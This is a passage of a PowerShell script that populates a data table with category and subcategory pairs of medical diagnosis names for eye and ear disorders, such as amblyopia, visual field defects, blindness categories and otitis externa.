astigmatism","Unspecified astigmatism, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified astigmatism","Unspecified astigmatism, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified astigmatism","Unspecified astigmatism, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified astigmatism","Unspecified astigmatism, unspecified eye") + $null = $DiagnosisList.Rows.Add("Irregular astigmatism","Irregular astigmatism, right eye") + $null = $DiagnosisList.Rows.Add("Irregular astigmatism","Irregular astigmatism, left eye") + $null = $DiagnosisList.Rows.Add("Irregular astigmatism","Irregular astigmatism, bilateral") + $null = $DiagnosisList.Rows.Add("Irregular astigmatism","Irregular astigmatism, unspecified eye") + $null = $DiagnosisList.Rows.Add("Regular astigmatism","Regular astigmatism, right eye") + $null = $DiagnosisList.Rows.Add("Regular astigmatism","Regular astigmatism, left eye") + $null = $DiagnosisList.Rows.Add("Regular astigmatism","Regular astigmatism, bilateral") + $null = $DiagnosisList.Rows.Add("Regular astigmatism","Regular astigmatism, unspecified eye") + $null = $DiagnosisList.Rows.Add("Anisometropia and aniseikonia","Anisometropia") + $null = $DiagnosisList.Rows.Add("Anisometropia and aniseikonia","Aniseikonia") + $null = $DiagnosisList.Rows.Add("Presbyopia","Presbyopia") + $null = $DiagnosisList.Rows.Add("Internal ophthalmoplegia (complete) (total)","Internal ophthalmoplegia (complete) (total), right eye") + $null = $DiagnosisList.Rows.Add("Internal ophthalmoplegia (complete) (total)","Internal ophthalmoplegia (complete) (total), left eye") + $null = $DiagnosisList.Rows.Add("Internal ophthalmoplegia (complete) (total)","Internal ophthalmoplegia (complete) (total), bilateral") + $null = $DiagnosisList.Rows.Add("Internal ophthalmoplegia (complete) (total)","Internal ophthalmoplegia (complete) (total), unspecified eye") + $null = $DiagnosisList.Rows.Add("Paresis of accommodation","Paresis of accommodation, right eye") + $null = $DiagnosisList.Rows.Add("Paresis of accommodation","Paresis of accommodation, left eye") + $null = $DiagnosisList.Rows.Add("Paresis of accommodation","Paresis of accommodation, bilateral") + $null = $DiagnosisList.Rows.Add("Paresis of accommodation","Paresis of accommodation, unspecified eye") + $null = $DiagnosisList.Rows.Add("Spasm of accommodation","Spasm of accommodation, right eye") + $null = $DiagnosisList.Rows.Add("Spasm of accommodation","Spasm of accommodation, left eye") + $null = $DiagnosisList.Rows.Add("Spasm of accommodation","Spasm of accommodation, bilateral") + $null = $DiagnosisList.Rows.Add("Spasm of accommodation","Spasm of accommodation, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other disorders of refraction","Other disorders of refraction") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of refraction","Unspecified disorder of refraction") + $null = $DiagnosisList.Rows.Add("Unspecified amblyopia","Unspecified amblyopia, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified amblyopia","Unspecified amblyopia, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified amblyopia","Unspecified amblyopia, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified amblyopia","Unspecified amblyopia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Deprivation amblyopia","Deprivation amblyopia, right eye") + $null = $DiagnosisList.Rows.Add("Deprivation amblyopia","Deprivation amblyopia, left eye") + $null = $DiagnosisList.Rows.Add("Deprivation amblyopia","Deprivation amblyopia, bilateral") + $null = $DiagnosisList.Rows.Add("Deprivation amblyopia","Deprivation amblyopia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Refractive amblyopia","Refractive amblyopia, right eye") + $null = $DiagnosisList.Rows.Add("Refractive amblyopia","Refractive amblyopia, left eye") + $null = $DiagnosisList.Rows.Add("Refractive amblyopia","Refractive amblyopia, bilateral") + $null = $DiagnosisList.Rows.Add("Refractive amblyopia","Refractive amblyopia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Strabismic amblyopia","Strabismic amblyopia, right eye") + $null = $DiagnosisList.Rows.Add("Strabismic amblyopia","Strabismic amblyopia, left eye") + $null = $DiagnosisList.Rows.Add("Strabismic amblyopia","Strabismic amblyopia, bilateral") + $null = $DiagnosisList.Rows.Add("Strabismic amblyopia","Strabismic amblyopia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Amblyopia suspect","Amblyopia suspect, right eye") + $null = $DiagnosisList.Rows.Add("Amblyopia suspect","Amblyopia suspect, left eye") + $null = $DiagnosisList.Rows.Add("Amblyopia suspect","Amblyopia suspect, bilateral") + $null = $DiagnosisList.Rows.Add("Amblyopia suspect","Amblyopia suspect, unspecified eye") + $null = $DiagnosisList.Rows.Add("Subjective visual disturbances","Unspecified subjective visual disturbances") + $null = $DiagnosisList.Rows.Add("Subjective visual disturbances","Day blindness") + $null = $DiagnosisList.Rows.Add("Transient visual loss","Transient visual loss, right eye") + $null = $DiagnosisList.Rows.Add("Transient visual loss","Transient visual loss, left eye") + $null = $DiagnosisList.Rows.Add("Transient visual loss","Transient visual loss, bilateral") + $null = $DiagnosisList.Rows.Add("Transient visual loss","Transient visual loss, unspecified eye") + $null = $DiagnosisList.Rows.Add("Sudden visual loss","Sudden visual loss, right eye") + $null = $DiagnosisList.Rows.Add("Sudden visual loss","Sudden visual loss, left eye") + $null = $DiagnosisList.Rows.Add("Sudden visual loss","Sudden visual loss, bilateral") + $null = $DiagnosisList.Rows.Add("Sudden visual loss","Sudden visual loss, unspecified eye") + $null = $DiagnosisList.Rows.Add("Visual discomfort","Visual discomfort, right eye") + $null = $DiagnosisList.Rows.Add("Visual discomfort","Visual discomfort, left eye") + $null = $DiagnosisList.Rows.Add("Visual discomfort","Visual discomfort, bilateral") + $null = $DiagnosisList.Rows.Add("Visual discomfort","Visual discomfort, unspecified") + $null = $DiagnosisList.Rows.Add("Visual distortions of shape and size","Visual distortions of shape and size") + $null = $DiagnosisList.Rows.Add("Psychophysical visual disturbances","Psychophysical visual disturbances") + $null = $DiagnosisList.Rows.Add("Other subjective visual disturbances","Other subjective visual disturbances") + $null = $DiagnosisList.Rows.Add("Diplopia","Diplopia") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of binocular vision","Unspecified disorder of binocular vision") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of binocular vision","Abnormal retinal correspondence") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of binocular vision","Fusion with defective stereopsis") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of binocular vision","Simultaneous visual perception without fusion") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of binocular vision","Suppression of binocular vision") + $null = $DiagnosisList.Rows.Add("Visual field defects","Unspecified visual field defects") + $null = $DiagnosisList.Rows.Add("Scotoma involving central area","Scotoma involving central area, right eye") + $null = $DiagnosisList.Rows.Add("Scotoma involving central area","Scotoma involving central area, left eye") + $null = $DiagnosisList.Rows.Add("Scotoma involving central area","Scotoma involving central area, bilateral") + $null = $DiagnosisList.Rows.Add("Scotoma involving central area","Scotoma involving central area, unspecified eye") + $null = $DiagnosisList.Rows.Add("Scotoma of blind spot area","Scotoma of blind spot area, right eye") + $null = $DiagnosisList.Rows.Add("Scotoma of blind spot area","Scotoma of blind spot area, left eye") + $null = $DiagnosisList.Rows.Add("Scotoma of blind spot area","Scotoma of blind spot area, bilateral") + $null = $DiagnosisList.Rows.Add("Scotoma of blind spot area","Scotoma of blind spot area, unspecified eye") + $null = $DiagnosisList.Rows.Add("Sector or arcuate defects","Sector or arcuate defects, right eye") + $null = $DiagnosisList.Rows.Add("Sector or arcuate defects","Sector or arcuate defects, left eye") + $null = $DiagnosisList.Rows.Add("Sector or arcuate defects","Sector or arcuate defects, bilateral") + $null = $DiagnosisList.Rows.Add("Sector or arcuate defects","Sector or arcuate defects, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other localized visual field defect","Other localized visual field defect, right eye") + $null = $DiagnosisList.Rows.Add("Other localized visual field defect","Other localized visual field defect, left eye") + $null = $DiagnosisList.Rows.Add("Other localized visual field defect","Other localized visual field defect, bilateral") + $null = $DiagnosisList.Rows.Add("Other localized visual field defect","Other localized visual field defect, unspecified eye") + $null = $DiagnosisList.Rows.Add("Homonymous bilateral field defects","Homonymous bilateral field defects, right side") + $null = $DiagnosisList.Rows.Add("Homonymous bilateral field defects","Homonymous bilateral field defects, left side") + $null = $DiagnosisList.Rows.Add("Homonymous bilateral field defects","Homonymous bilateral field defects, unspecified side") + $null = $DiagnosisList.Rows.Add("Heteronymous bilateral field defects","Heteronymous bilateral field defects") + $null = $DiagnosisList.Rows.Add("Generalized contraction of visual field","Generalized contraction of visual field, right eye") + $null = $DiagnosisList.Rows.Add("Generalized contraction of visual field","Generalized contraction of visual field, left eye") + $null = $DiagnosisList.Rows.Add("Generalized contraction of visual field","Generalized contraction of visual field, bilateral") + $null = $DiagnosisList.Rows.Add("Generalized contraction of visual field","Generalized contraction of visual field, unspecified eye") + $null = $DiagnosisList.Rows.Add("Color vision deficiencies","Unspecified color vision deficiencies") + $null = $DiagnosisList.Rows.Add("Color vision deficiencies","Achromatopsia") + $null = $DiagnosisList.Rows.Add("Color vision deficiencies","Acquired color vision deficiency") + $null = $DiagnosisList.Rows.Add("Color vision deficiencies","Deuteranomaly") + $null = $DiagnosisList.Rows.Add("Color vision deficiencies","Protanomaly") + $null = $DiagnosisList.Rows.Add("Color vision deficiencies","Tritanomaly") + $null = $DiagnosisList.Rows.Add("Color vision deficiencies","Other color vision deficiencies") + $null = $DiagnosisList.Rows.Add("Night blindness","Unspecified night blindness") + $null = $DiagnosisList.Rows.Add("Night blindness","Abnormal dark adaptation curve") + $null = $DiagnosisList.Rows.Add("Night blindness","Acquired night blindness") + $null = $DiagnosisList.Rows.Add("Night blindness","Congenital night blindness") + $null = $DiagnosisList.Rows.Add("Night blindness","Other night blindness") + $null = $DiagnosisList.Rows.Add("Vision sensitivity deficiencies","Glare sensitivity") + $null = $DiagnosisList.Rows.Add("Vision sensitivity deficiencies","Impaired contrast sensitivity") + $null = $DiagnosisList.Rows.Add("Other visual disturbances","Other visual disturbances") + $null = $DiagnosisList.Rows.Add("Unspecified visual disturbance","Unspecified visual disturbance") + $null = $DiagnosisList.Rows.Add("Blindness right eye, category 3","Blindness right eye category 3, blindness left eye category 3") + $null = $DiagnosisList.Rows.Add("Blindness right eye, category 3","Blindness right eye category 3, blindness left eye category 4") + $null = $DiagnosisList.Rows.Add("Blindness right eye, category 3","Blindness right eye category 3, blindness left eye category 5") + $null = $DiagnosisList.Rows.Add("Blindness right eye, category 4","Blindness right eye category 4, blindness left eye category 3") + $null = $DiagnosisList.Rows.Add("Blindness right eye, category 4","Blindness right eye category 4, blindness left eye category 4") + $null = $DiagnosisList.Rows.Add("Blindness right eye, category 4","Blindness right eye category 4, blindness left eye category 5") + $null = $DiagnosisList.Rows.Add("Blindness right eye, category 5","Blindness right eye category 5, blindness left eye category 3") + $null = $DiagnosisList.Rows.Add("Blindness right eye, category 5","Blindness right eye category 5, blindness left eye category 4") + $null = $DiagnosisList.Rows.Add("Blindness right eye, category 5","Blindness right eye category 5, blindness left eye category 5") + $null = $DiagnosisList.Rows.Add("Blindness, one eye, low vision other eye","Blindness, one eye, low vision other eye, unspecified eyes") + $null = $DiagnosisList.Rows.Add("Blindness right eye category 3, low vision left eye","Blindness right eye category 3, low vision left eye category 1") + $null = $DiagnosisList.Rows.Add("Blindness right eye category 3, low vision left eye","Blindness right eye category 3, low vision left eye category 2") + $null = $DiagnosisList.Rows.Add("Blindness right eye category 4, low vision left eye","Blindness right eye category 4, low vision left eye category 1") + $null = $DiagnosisList.Rows.Add("Blindness right eye category 4, low vision left eye","Blindness right eye category 4, low vision left eye category 2") + $null = $DiagnosisList.Rows.Add("Blindness right eye category 5, low vision left eye","Blindness right eye category 5, low vision left eye category 1") + $null = $DiagnosisList.Rows.Add("Blindness right eye category 5, low vision left eye","Blindness right eye category 5, low vision left eye category 2") + $null = $DiagnosisList.Rows.Add("Low vision right eye category 1, blindness left eye","Low vision right eye category 1, blindness left eye category 3") + $null = $DiagnosisList.Rows.Add("Low vision right eye category 1, blindness left eye","Low vision right eye category 1, blindness left eye category 4") + $null = $DiagnosisList.Rows.Add("Low vision right eye category 1, blindness left eye","Low vision right eye category 1, blindness left eye category 5") + $null = $DiagnosisList.Rows.Add("Low vision right eye category 2, blindness left eye","Low vision right eye category 2, blindness left eye category 3") + $null = $DiagnosisList.Rows.Add("Low vision right eye category 2, blindness left eye","Low vision right eye category 2, blindness left eye category 4") + $null = $DiagnosisList.Rows.Add("Low vision right eye category 2, blindness left eye","Low vision right eye category 2, blindness left eye category 5") + $null = $DiagnosisList.Rows.Add("Low vision, right eye, category 1","Low vision right eye category 1, low vision left eye category 1") + $null = $DiagnosisList.Rows.Add("Low vision, right eye, category 1","Low vision right eye category 1, low vision left eye category 2") + $null = $DiagnosisList.Rows.Add("Low vision, right eye, category 2","Low vision right eye category 2, low vision left eye category 1") + $null = $DiagnosisList.Rows.Add("Low vision, right eye, category 2","Low vision right eye category 2, low vision left eye category 2") + $null = $DiagnosisList.Rows.Add("Unqualified visual loss, both eyes","Unqualified visual loss, both eyes") + $null = $DiagnosisList.Rows.Add("Blindness, one eye","Blindness, one eye, unspecified eye") + $null = $DiagnosisList.Rows.Add("Blindness, right eye, category 3","Blindness right eye category 3, normal vision left eye") + $null = $DiagnosisList.Rows.Add("Blindness, right eye, category 4","Blindness right eye category 4, normal vision left eye") + $null = $DiagnosisList.Rows.Add("Blindness, right eye, category 5","Blindness right eye category 5, normal vision left eye") + $null = $DiagnosisList.Rows.Add("Blindness, left eye, category 3-5","Blindness left eye category 3, normal vision right eye") + $null = $DiagnosisList.Rows.Add("Blindness, left eye, category 3-5","Blindness left eye category 4, normal vision right eye") + $null = $DiagnosisList.Rows.Add("Blindness, left eye, category 3-5","Blindness left eye category 5, normal vision right eye") + $null = $DiagnosisList.Rows.Add("Low vision, one eye","Low vision, one eye, unspecified eye") + $null = $DiagnosisList.Rows.Add("Low vision, right eye, category 1-2","Low vision right eye category 1, normal vision left eye") + $null = $DiagnosisList.Rows.Add("Low vision right eye category 2, normal vision left eye","Low vision right eye category 2, normal vision left eye") + $null = $DiagnosisList.Rows.Add("Low vision, left eye, category 1-2","Low vision left eye category 1, normal vision right eye") + $null = $DiagnosisList.Rows.Add("Low vision, left eye, category 1-2","Low vision left eye category 2, normal vision right eye") + $null = $DiagnosisList.Rows.Add("Unqualified visual loss, one eye","Unqualified visual loss, one eye, unspecified") + $null = $DiagnosisList.Rows.Add("Unqualified visual loss, one eye","Unqualified visual loss, right eye, normal vision left eye") + $null = $DiagnosisList.Rows.Add("Unqualified visual loss, one eye","Unqualified visual loss, left eye, normal vision right eye") + $null = $DiagnosisList.Rows.Add("Unspecified visual loss","Unspecified visual loss") + $null = $DiagnosisList.Rows.Add("Legal blindness, as defined in USA","Legal blindness, as defined in USA") + $null = $DiagnosisList.Rows.Add("Nystagmus","Unspecified nystagmus") + $null = $DiagnosisList.Rows.Add("Nystagmus","Congenital nystagmus") + $null = $DiagnosisList.Rows.Add("Nystagmus","Latent nystagmus") + $null = $DiagnosisList.Rows.Add("Nystagmus","Visual deprivation nystagmus") + $null = $DiagnosisList.Rows.Add("Nystagmus","Dissociated nystagmus") + $null = $DiagnosisList.Rows.Add("Nystagmus","Other forms of nystagmus") + $null = $DiagnosisList.Rows.Add("Other irregular eye movements","Saccadic eye movements") + $null = $DiagnosisList.Rows.Add("Other irregular eye movements","Other irregular eye movements") + $null = $DiagnosisList.Rows.Add("Anomalies of pupillary function","Unspecified anomaly of pupillary function") + $null = $DiagnosisList.Rows.Add("Anomalies of pupillary function","Argyll Robertson pupil, atypical") + $null = $DiagnosisList.Rows.Add("Anomalies of pupillary function","Anisocoria") + $null = $DiagnosisList.Rows.Add("Anomalies of pupillary function","Miosis") + $null = $DiagnosisList.Rows.Add("Anomalies of pupillary function","Mydriasis") + $null = $DiagnosisList.Rows.Add("Tonic pupil","Tonic pupil, right eye") + $null = $DiagnosisList.Rows.Add("Tonic pupil","Tonic pupil, left eye") + $null = $DiagnosisList.Rows.Add("Tonic pupil","Tonic pupil, bilateral") + $null = $DiagnosisList.Rows.Add("Tonic pupil","Tonic pupil, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other anomalies of pupillary function","Other anomalies of pupillary function") + $null = $DiagnosisList.Rows.Add("Ocular pain","Ocular pain, unspecified eye") + $null = $DiagnosisList.Rows.Add("Ocular pain","Ocular pain, right eye") + $null = $DiagnosisList.Rows.Add("Ocular pain","Ocular pain, left eye") + $null = $DiagnosisList.Rows.Add("Ocular pain","Ocular pain, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified disorders of eye and adnexa","Other specified disorders of eye and adnexa") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of eye and adnexa","Unspecified disorder of eye and adnexa") + $null = $DiagnosisList.Rows.Add("Keratopathy (bullous aphakic) following cataract surgery","Keratopathy (bullous aphakic) following cataract surgery, right eye") + $null = $DiagnosisList.Rows.Add("Keratopathy (bullous aphakic) following cataract surgery","Keratopathy (bullous aphakic) following cataract surgery, left eye") + $null = $DiagnosisList.Rows.Add("Keratopathy (bullous aphakic) following cataract surgery","Keratopathy (bullous aphakic) following cataract surgery, bilateral") + $null = $DiagnosisList.Rows.Add("Keratopathy (bullous aphakic) following cataract surgery","Keratopathy (bullous aphakic) following cataract surgery, unspecified eye") + $null = $DiagnosisList.Rows.Add("Cataract (lens) fragments in eye following cataract surgery","Cataract (lens) fragments in eye following cataract surgery, right eye") + $null = $DiagnosisList.Rows.Add("Cataract (lens) fragments in eye following cataract surgery","Cataract (lens) fragments in eye following cataract surgery, left eye") + $null = $DiagnosisList.Rows.Add("Cataract (lens) fragments in eye following cataract surgery","Cataract (lens) fragments in eye following cataract surgery, bilateral") + $null = $DiagnosisList.Rows.Add("Cataract (lens) fragments in eye following cataract surgery","Cataract (lens) fragments in eye following cataract surgery, unspecified eye") + $null = $DiagnosisList.Rows.Add("Cystoid macular edema following cataract surgery","Cystoid macular edema following cataract surgery, right eye") + $null = $DiagnosisList.Rows.Add("Cystoid macular edema following cataract surgery","Cystoid macular edema following cataract surgery, left eye") + $null = $DiagnosisList.Rows.Add("Cystoid macular edema following cataract surgery","Cystoid macular edema following cataract surgery, bilateral") + $null = $DiagnosisList.Rows.Add("Cystoid macular edema following cataract surgery","Cystoid macular edema following cataract surgery, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other disorders of the eye following cataract surgery","Other disorders of the right eye following cataract surgery") + $null = $DiagnosisList.Rows.Add("Other disorders of the eye following cataract surgery","Other disorders of the left eye following cataract surgery") + $null = $DiagnosisList.Rows.Add("Other disorders of the eye following cataract surgery","Other disorders of the eye following cataract surgery, bilateral") + $null = $DiagnosisList.Rows.Add("Other disorders of the eye following cataract surgery","Other disorders of unspecified eye following cataract surgery") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of eye and adnexa complicating an ophthalmic procedure","Intraoperative hemorrhage and hematoma of right eye and adnexa complicating an ophthalmic procedure") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of eye and adnexa complicating an ophthalmic procedure","Intraoperative hemorrhage and hematoma of left eye and adnexa complicating an ophthalmic procedure") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of eye and adnexa complicating an ophthalmic procedure","Intraoperative hemorrhage and hematoma of eye and adnexa complicating an ophthalmic procedure, bilateral") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of eye and adnexa complicating an ophthalmic procedure","Intraoperative hemorrhage and hematoma of unspecified eye and adnexa complicating an ophthalmic procedure") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of eye and adnexa complicating other procedure","Intraoperative hemorrhage and hematoma of right eye and adnexa complicating other procedure") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of eye and adnexa complicating other procedure","Intraoperative hemorrhage and hematoma of left eye and adnexa complicating other procedure") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of eye and adnexa complicating other procedure","Intraoperative hemorrhage and hematoma of eye and adnexa complicating other procedure, bilateral") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of eye and adnexa complicating other procedure","Intraoperative hemorrhage and hematoma of unspecified eye and adnexa complicating other procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of eye and adnexa during an ophthalmic procedure","Accidental puncture and laceration of right eye and adnexa during an ophthalmic procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of eye and adnexa during an ophthalmic procedure","Accidental puncture and laceration of left eye and adnexa during an ophthalmic procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of eye and adnexa during an ophthalmic procedure","Accidental puncture and laceration of eye and adnexa during an ophthalmic procedure, bilateral") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of eye and adnexa during an ophthalmic procedure","Accidental puncture and laceration of unspecified eye and adnexa during an ophthalmic procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of eye and adnexa during other procedure","Accidental puncture and laceration of right eye and adnexa during other procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of eye and adnexa during other procedure","Accidental puncture and laceration of left eye and adnexa during other procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of eye and adnexa during other procedure","Accidental puncture and laceration of eye and adnexa during other procedure, bilateral") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of eye and adnexa during other procedure","Accidental puncture and laceration of unspecified eye and adnexa during other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of eye and adnexa following an ophthalmic procedure","Postprocedural hemorrhage of right eye and adnexa following an ophthalmic procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of eye and adnexa following an ophthalmic procedure","Postprocedural hemorrhage of left eye and adnexa following an ophthalmic procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of eye and adnexa following an ophthalmic procedure","Postprocedural hemorrhage of eye and adnexa following an ophthalmic procedure, bilateral") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of eye and adnexa following an ophthalmic procedure","Postprocedural hemorrhage of unspecified eye and adnexa following an ophthalmic procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of eye and adnexa following other procedure","Postprocedural hemorrhage of right eye and adnexa following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of eye and adnexa following other procedure","Postprocedural hemorrhage of left eye and adnexa following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of eye and adnexa following other procedure","Postprocedural hemorrhage of eye and adnexa following other procedure, bilateral") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of eye and adnexa following other procedure","Postprocedural hemorrhage of unspecified eye and adnexa following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma of eye and adnexa following an ophthalmic procedure","Postprocedural hematoma of right eye and adnexa following an ophthalmic procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma of eye and adnexa following an ophthalmic procedure","Postprocedural hematoma of left eye and adnexa following an ophthalmic procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma of eye and adnexa following an ophthalmic procedure","Postprocedural hematoma of eye and adnexa following an ophthalmic procedure, bilateral") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma of eye and adnexa following an ophthalmic procedure","Postprocedural hematoma of unspecified eye and adnexa following an ophthalmic procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma of eye and adnexa following other procedure","Postprocedural hematoma of right eye and adnexa following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma of eye and adnexa following other procedure","Postprocedural hematoma of left eye and adnexa following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma of eye and adnexa following other procedure","Postprocedural hematoma of eye and adnexa following other procedure, bilateral") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma of eye and adnexa following other procedure","Postprocedural hematoma of unspecified eye and adnexa following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural seroma of eye and adnexa following an ophthalmic procedure","Postprocedural seroma of right eye and adnexa following an ophthalmic procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural seroma of eye and adnexa following an ophthalmic procedure","Postprocedural seroma of left eye and adnexa following an ophthalmic procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural seroma of eye and adnexa following an ophthalmic procedure","Postprocedural seroma of eye and adnexa following an ophthalmic procedure, bilateral") + $null = $DiagnosisList.Rows.Add("Postprocedural seroma of eye and adnexa following an ophthalmic procedure","Postprocedural seroma of unspecified eye and adnexa following an ophthalmic procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural seroma of eye and adnexa following other procedure","Postprocedural seroma of right eye and adnexa following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural seroma of eye and adnexa following other procedure","Postprocedural seroma of left eye and adnexa following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural seroma of eye and adnexa following other procedure","Postprocedural seroma of eye and adnexa following other procedure, bilateral") + $null = $DiagnosisList.Rows.Add("Postprocedural seroma of eye and adnexa following other procedure","Postprocedural seroma of unspecified eye and adnexa following other procedure") + $null = $DiagnosisList.Rows.Add("Inflammation (infection) of postprocedural bleb","Inflammation (infection) of postprocedural bleb, unspecified") + $null = $DiagnosisList.Rows.Add("Inflammation (infection) of postprocedural bleb","Inflammation (infection) of postprocedural bleb, stage 1") + $null = $DiagnosisList.Rows.Add("Inflammation (infection) of postprocedural bleb","Inflammation (infection) of postprocedural bleb, stage 2") + $null = $DiagnosisList.Rows.Add("Inflammation (infection) of postprocedural bleb","Inflammation (infection) of postprocedural bleb, stage 3") + $null = $DiagnosisList.Rows.Add("Chorioretinal scars after surgery for detachment","Chorioretinal scars after surgery for detachment, right eye") + $null = $DiagnosisList.Rows.Add("Chorioretinal scars after surgery for detachment","Chorioretinal scars after surgery for detachment, left eye") + $null = $DiagnosisList.Rows.Add("Chorioretinal scars after surgery for detachment","Chorioretinal scars after surgery for detachment, bilateral") + $null = $DiagnosisList.Rows.Add("Chorioretinal scars after surgery for detachment","Chorioretinal scars after surgery for detachment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other intraoperative complications of eye and adnexa, not elsewhere classified","Other intraoperative complications of eye and adnexa, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other postprocedural complications and disorders of eye and adnexa, not elsewhere classified","Other postprocedural complications and disorders of eye and adnexa, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Abscess of external ear","Abscess of external ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Abscess of external ear","Abscess of right external ear") + $null = $DiagnosisList.Rows.Add("Abscess of external ear","Abscess of left external ear") + $null = $DiagnosisList.Rows.Add("Abscess of external ear","Abscess of external ear, bilateral") + $null = $DiagnosisList.Rows.Add("Cellulitis of external ear","Cellulitis of external ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Cellulitis of external ear","Cellulitis of right external ear") + $null = $DiagnosisList.Rows.Add("Cellulitis of external ear","Cellulitis of left external ear") + $null = $DiagnosisList.Rows.Add("Cellulitis of external ear","Cellulitis of external ear, bilateral") + $null = $DiagnosisList.Rows.Add("Malignant otitis externa","Malignant otitis externa, unspecified ear") + $null = $DiagnosisList.Rows.Add("Malignant otitis externa","Malignant otitis externa, right ear") + $null = $DiagnosisList.Rows.Add("Malignant otitis externa","Malignant otitis externa, left ear") + $null = $DiagnosisList.Rows.Add("Malignant otitis externa","Malignant otitis externa, bilateral") + $null = $DiagnosisList.Rows.Add("Diffuse otitis externa","Diffuse otitis externa, right ear") + $null = $DiagnosisList.Rows.Add("Diffuse otitis externa","Diffuse otitis externa, left ear") + $null = $DiagnosisList.Rows.Add("Diffuse otitis externa","Diffuse otitis externa, bilateral") + $null = $DiagnosisList.Rows.Add("Diffuse otitis externa","Diffuse otitis externa, unspecified ear") + $null = $DiagnosisList.Rows.Add("Hemorrhagic otitis externa","Hemorrhagic otitis externa, right ear") + $null = $DiagnosisList.Rows.Add("Hemorrhagic otitis externa","Hemorrhagic otitis externa, left ear") + $null = $DiagnosisList.Rows.Add("Hemorrhagic otitis externa","Hemorrhagic otitis externa, bilateral") + $null = $DiagnosisList.Rows.Add("Hemorrhagic otitis externa","Hemorrhagic otitis externa, unspecified ear") + $null = $DiagnosisList.Rows.Add("Swimmer's ear","Swimmer's ear, right ear") + $null = $DiagnosisList.Rows.Add("Swimmer's ear","Swimmer's ear, left ear") + $null = $DiagnosisList.Rows.Add("Swimmer's ear","Swimmer's ear, bilateral") + $null = $DiagnosisList.Rows.Add("Swimmer's ear","Swimmer's ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other infective otitis externa","Other infective otitis externa, right ear") + $null = $DiagnosisList.Rows.Add("Other infective otitis externa","Other infective otitis externa, left ear") + $null = $DiagnosisList.Rows.Add("Other infective otitis externa","Other infective otitis externa, bilateral") + $null = $DiagnosisList.Rows.Add("Other infective otitis externa","Other infective otitis externa, unspecified ear") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of external ear","Cholesteatoma of external ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of external ear","Cholesteatoma of right external ear") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of external ear","Cholesteatoma of left external ear") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of external ear","Cholesteatoma of external ear, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified acute noninfective otitis externa","Unspecified acute noninfective otitis externa, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified acute noninfective otitis externa","Unspecified acute noninfective otitis externa, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified acute noninfective otitis 